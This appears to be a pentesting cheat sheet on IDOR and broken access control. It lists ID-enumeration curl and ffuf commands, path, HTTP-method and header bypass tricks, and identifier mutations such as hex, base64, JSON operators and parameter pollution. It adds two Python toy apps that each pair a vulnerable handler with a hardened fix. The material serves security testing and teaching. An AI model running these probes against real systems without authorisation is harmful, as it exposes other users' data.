
IDOR & Access Control


IDOR (Insecure Direct Object Reference)

Quick Check (One-liner)

# Quick IDOR test: print "<id> <status>" per id and drop the ones the server refused
# (-s strips the status line from the body, so grep on the body alone never sees 401/403; ask curl for it with -w)
for i in $(seq 1 10); do printf '%s ' "$i"; curl -s -o /dev/null -w '%{http_code}\n' "https://$rhost/api/user/$i" -H "Cookie: $cookie"; done | grep -v ' 40[13]$'

Common IDOR Parameters

id=
user_id=
account=
number=
order=
doc=
key=
email=
group=
profile=
edit=
report=
file=

Testing Examples

# Original request
GET /api/user/profile?id=123

# Test IDOR
GET /api/user/profile?id=124
GET /api/user/profile?id=1
GET /api/user/profile?id=0

In URLs

/user/123/profile → /user/124/profile
/order/1001 → /order/1002
/invoice/INV-001 → /invoice/INV-002
/download?file=report_123.pdf → /download?file=report_124.pdf

In Request Body

// Original
{"user_id": 123, "action": "view"}

// Test
{"user_id": 124, "action": "view"}
{"user_id": 1, "action": "view"}

In Headers

X-User-Id: 123 → X-User-Id: 124
Cookie: user=123 → Cookie: user=124

Broken Access Control

Privilege Escalation

Horizontal

# Same privilege level, different user
User A accessing User B's data

Vertical

# Lower privilege accessing higher privilege functions
Regular user accessing admin functions

Common Vulnerabilities

Missing Function Level Access Control

# User endpoint
GET /api/user/profile

# Admin endpoint (should be protected)
GET /api/admin/users
POST /api/admin/user/delete

Bypassing Access Control via URL

/admin → /Admin
/admin → /ADMIN
/admin → /admin/
/admin → /admin//
/admin → /.admin
/admin → /admin.html
/admin → /admin.php
/admin → /admin%20
/admin → /admin%09
/admin → /admin%00

Via HTTP Method

GET /admin/delete → Blocked
POST /admin/delete → Allowed?
PUT /admin/delete → Allowed?
OPTIONS /admin/delete → Check allowed methods

Via Headers

X-Original-URL: /admin/delete
X-Rewrite-URL: /admin/delete
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
X-Custom-IP-Authorization: 127.0.0.1
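Why the URL, method and header tricks above can work: the access check is often a string comparison on the raw request, run before the framework normalizes the path and resolves a handler, and sometimes only for one HTTP method. The following is an added example, not code from the original cheat sheet: a constructed toy app (every name in it is hypothetical) with a deny-list ACL on the raw path for GET only, a router that percent-decodes, lowercases and strips trailing junk, and a backend that trusts a client-supplied X-Original-URL after the ACL already ran. The hardened version resolves the route first and authorizes the resolved handler for every method.

```python
# Added example (not from the original cheat sheet). Toy app, all names hypothetical:
# an exact-match deny-list ACL on the raw path, applied to GET only, in front of a
# router that normalizes the path, plus a backend that honors X-Original-URL.
from urllib.parse import unquote

BLOCKED = {"/admin", "/admin/delete"}   # naive proxy-style deny-list of admin URLs


def naive_acl(method, raw_path, is_admin):
    """Vulnerable: exact string match on the raw path, and only for GET."""
    return is_admin or not (method == "GET" and raw_path in BLOCKED)


def normalize(path):
    """Typical framework normalization: percent-decode, cut at NUL, strip trailing
    whitespace and slashes, collapse '//', drop .html/.php, lowercase."""
    p = unquote(path).split("\x00", 1)[0].rstrip()
    while "//" in p:
        p = p.replace("//", "/")
    p = p.rstrip("/")
    for ext in (".html", ".php"):
        if p.endswith(ext):
            p = p[: -len(ext)]
    return p.lower()


def route(path):
    """Resolve a path to a handler name after normalization."""
    n = normalize(path)
    return {"/admin": "admin_panel", "/admin/delete": "admin_delete"}.get(n, "not_found")


def vulnerable_app(method, raw_path, headers=None, is_admin=False):
    headers = headers or {}
    if not naive_acl(method, raw_path, is_admin):
        return 403, "forbidden"
    # Backend trusts X-Original-URL (a proxy rewrite header) AFTER the ACL already ran
    handler = route(headers.get("X-Original-URL", raw_path))
    return (404, "not found") if handler == "not_found" else (200, handler)


def hardened_app(method, raw_path, headers=None, is_admin=False):
    """Fix: resolve the route first, then authorize the resolved handler for every
    method, and never take the path from a client-controlled header."""
    handler = route(raw_path)
    if handler == "not_found":
        return 404, "not found"
    if handler.startswith("admin_") and not is_admin:
        return 403, "forbidden"
    return 200, handler


# Constructed probe set: the URL variants from the list above, a method switch,
# and a header override. The first entry is the control (the literal blocked URL).
BYPASS_CASES = [
    ("GET", "/admin", {}),
    ("GET", "/Admin", {}),
    ("GET", "/admin/", {}),
    ("GET", "/admin//", {}),
    ("GET", "/admin.html", {}),
    ("GET", "/admin%20", {}),
    ("GET", "/admin%00", {}),
    ("POST", "/admin/delete", {}),
    ("GET", "/", {"X-Original-URL": "/admin/delete"}),
]


def bypasses(app):
    """Return the (method, path) pairs that reach an admin handler as a non-admin."""
    return [(m, p) for m, p, h in BYPASS_CASES if app(m, p, h)[0] == 200]


if __name__ == "__main__":
    print("vulnerable:", bypasses(vulnerable_app))
    print("hardened:  ", bypasses(hardened_app))
```

Against the vulnerable app every variant except the literal `/admin` reaches an admin handler; against the hardened app none do, while an admin session still gets `admin_panel`. The `/.admin` variant from the list is not covered by this toy's normalizer; it depends on the specific server's path handling.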

Testing Techniques

Using Burp Suite

  1. Log in as User A
  2. Capture requests containing user identifiers
  3. Send to Repeater
  4. Modify identifiers to User B's values
  5. Check if access is granted

Autorize Extension

  1. Install Autorize in Burp
  2. Log in as low-privilege user
  3. Copy cookies to Autorize
  4. Browse as high-privilege user
  5. Autorize will test each request with low-privilege cookies

Using cURL

# Save cookies from login
curl -c cookies.txt -X POST http://$rhost/login -d "user=admin&pass=xxx"

# Access other user's resource
curl -b cookies.txt http://$rhost/api/user/124/profile

Fuzzing IDs

# Generate the number list first
seq 1 1000 > numbers.txt

# Fuzz the id with ffuf; -mc 200 keeps only 200 responses, add -fs <size> to drop a constant-size "not yours" page
ffuf -w numbers.txt -u "http://$rhost/api/user/FUZZ/profile" -H "Cookie: session=xxx" -mc 200

UUID/GUID Testing

# Original
550e8400-e29b-41d4-a716-446655440000

# Test patterns
550e8400-e29b-41d4-a716-446655440001
00000000-0000-0000-0000-000000000000
ffffffff-ffff-ffff-ffff-ffffffffffff

Bypass Methods

Encoded Values

id=123 → id=124
id=123 → id=0x7C (hex)
id=123 → id=MTI0 (base64 of "124")

Wrapped Values

{"id": 123} → {"id": [123]}
{"id": 123} → {"id": {"$eq": 124}}
{"id": 123} → {"id": "123"}

Parameter Pollution

?id=123 → ?id=123&id=124
?id=123 → ?id=124&id=123

Changing Content-Type

Content-Type: application/x-www-form-urlencoded
→ Content-Type: application/json

user_id=123 → {"user_id": 124}

Using Wildcards

/api/user/*/profile
/api/user/../admin/profile

Case Sensitivity

/User/123 → /user/123
/USER/123 → /user/123
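The Burp/Autorize workflow above and the identifier variants under Bypass Methods combine naturally into one script: fetch a resource as its owner, then replay each mutated identifier with a lower-privileged session and flag any 200 whose body equals the owner's view. The following is an added example, not code from the original cheat sheet. The target is a constructed in-memory app (all names hypothetical) whose edge check only polices the first `id` value and only when it is a plain decimal, while the backend takes the last value and parses leniently; that gap is exactly what the hex, base64, JSON, operator and parameter-pollution variants exploit. To use the probe against a lab, replace `send` with an HTTP client call.

```python
# Added example (not from the original cheat sheet). Differential IDOR probe plus
# the identifier mutations from "Bypass Methods", run against a constructed toy app.
import base64
import json
import re

# --- constructed target (hypothetical data) ---------------------------------
PROFILES = {123: {"owner": 123, "name": "alice"}, 124: {"owner": 124, "name": "bob"}}
SESSIONS = {"sess_A": 123, "sess_B": 124}   # cookie -> user id


def resolve_id(value):
    """Lenient backend parsing; each branch is what one mutation relies on."""
    if isinstance(value, list):            # ?id=123&id=124 or {"id": [124]}: last wins
        value = value[-1]
    if isinstance(value, dict):            # {"id": {"$eq": 124}}: operator object
        value = value.get("$eq")
    if isinstance(value, str):
        try:
            return int(value, 0)           # "124", "0x7C"
        except ValueError:
            return int(base64.b64decode(value).decode())   # "MTI0" -> "124"
    return int(value)


def gateway_authz(cookie, params):
    """Flawed edge check: looks only at the FIRST `id`, and only when it is a
    plain decimal string; anything else is waved through as 'not an id'."""
    first = params.get("id")
    if isinstance(first, list):
        first = first[0]
    if isinstance(first, str) and first.isdigit() and int(first) != SESSIONS[cookie]:
        return False
    return True


def vulnerable_send(cookie, params):
    """Vulnerable: authorization happens at the gateway, on the raw input."""
    if cookie not in SESSIONS:
        return 401, None
    if not gateway_authz(cookie, params):
        return 403, None
    try:
        pid = resolve_id(params["id"])
    except (ValueError, TypeError, KeyError):
        return 400, None
    return (200, PROFILES[pid]) if pid in PROFILES else (404, None)


def hardened_send(cookie, params):
    """Fix: resolve the object first, then check ownership of the RESOLVED object."""
    if cookie not in SESSIONS:
        return 401, None
    try:
        pid = resolve_id(params["id"])
    except (ValueError, TypeError, KeyError):
        return 400, None
    prof = PROFILES.get(pid)
    if prof is None:
        return 404, None
    if prof["owner"] != SESSIONS[cookie]:
        return 403, None
    return 200, prof


# --- the probe ---------------------------------------------------------------
def mutations(mine, target):
    """Identifier variants from the Bypass Methods section, as request params."""
    t = str(target)
    return {
        "sequential":      {"id": t},
        "hex":             {"id": hex(target)},
        "base64":          {"id": base64.b64encode(t.encode()).decode()},
        "json_int":        {"id": target},              # Content-Type switched to JSON
        "json_array":      {"id": [target]},
        "json_operator":   {"id": {"$eq": target}},
        "param_pollution": {"id": [str(mine), t]},      # ?id=123&id=124
    }


def idor_probe(send, attacker_cookie, victim_cookie, victim_params, mine, target):
    """Autorize-style check: fetch the resource as the victim, then replay each
    mutated identifier with the attacker's session. A hit is a 200 whose body
    equals the victim's own view of the resource."""
    status, expected = send(victim_cookie, victim_params)
    assert status == 200, "victim must be able to see their own resource"
    hits = []
    for name, params in mutations(mine, target).items():
        status, body = send(attacker_cookie, params)
        if status == 200 and body == expected:
            hits.append(name)
    return hits


if __name__ == "__main__":
    args = ("sess_A", "sess_B", {"id": "124"}, 123, 124)
    print("vulnerable:", json.dumps(idor_probe(vulnerable_send, *args)))
    print("hardened:  ", json.dumps(idor_probe(hardened_send, *args)))
```

Note what the probe reports against the vulnerable app: the plain sequential `id=124` is correctly refused (403), which is where a manual test often stops, yet every encoded, wrapped or polluted variant returns bob's profile. The hardened handler reports no hits because the ownership check runs on the object the backend actually loaded, not on the string the gateway saw; tightening `resolve_id` to accept only a plain integer is a second, independent layer.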

Common IDOR Scenarios

| Scenario      | Original                   | Test                       |
|---------------|----------------------------|----------------------------|
| View profile  | /user/123                  | /user/124                  |
| Download file | /download?id=abc           | /download?id=abd           |
| Edit account  | POST /edit {"user_id": 1}  | POST /edit {"user_id": 2}  |
| Delete item   | DELETE /item/100           | DELETE /item/101           |
| View order    | /order/ORD-001             | /order/ORD-002             |
| API endpoint  | /api/v1/users/me           | /api/v1/users/1            |

Payload Cheat Sheet

| Technique           | Example                       |
|---------------------|-------------------------------|
| Sequential ID       | id=123 → id=124               |
| Predictable format  | ORD-001 → ORD-002             |
| UUID manipulation   | Change last digit             |
| Parameter pollution | ?id=1&id=2                    |
| Encoded value       | id=MTI0 (base64 of "124")     |
| JSON array          | {"id": [124]}                 |
| HTTP method         | GET → POST                    |
| Header bypass       | X-Original-URL: /admin        |

📚 See Also

Related Web Attacks